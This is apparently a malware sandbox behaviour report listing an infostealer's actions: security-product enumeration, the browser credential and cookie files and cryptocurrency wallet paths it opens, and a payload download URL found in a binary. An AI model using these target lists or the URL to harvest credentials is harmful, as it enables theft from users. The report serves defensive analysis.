                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014444001\1d09097be7.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\ucrtbase.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\_ctypes.pyd VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-console-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-file-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-heap-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-localization-l1-2-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-memory-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-rtlsupport-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-core-util-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-conio-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-math-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-process-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\api-ms-win-crt-time-l1-1-0.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\libcrypto-1_1.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\libffi-7.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402\base_library.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI36402 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\Documents VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0025CBEA
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F7D2C8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,9_2_00007FF643F7D2C8
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2668885421.0000000001403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 602c785fe5.exe PID: 1660, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FBFF.tmp.fcxcx.exe PID: 520, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe, type: DROPPED
                      Source: Yara matchFile source: 0000002D.00000003.2490452576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: dwVrTdy.exeString found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q0C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                      Source: dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: TelegramBotgramData\Guest\exodus\*
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: dwVrTdy.exeString found in binary or memory: C:\ProgramData\%s\exodus
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
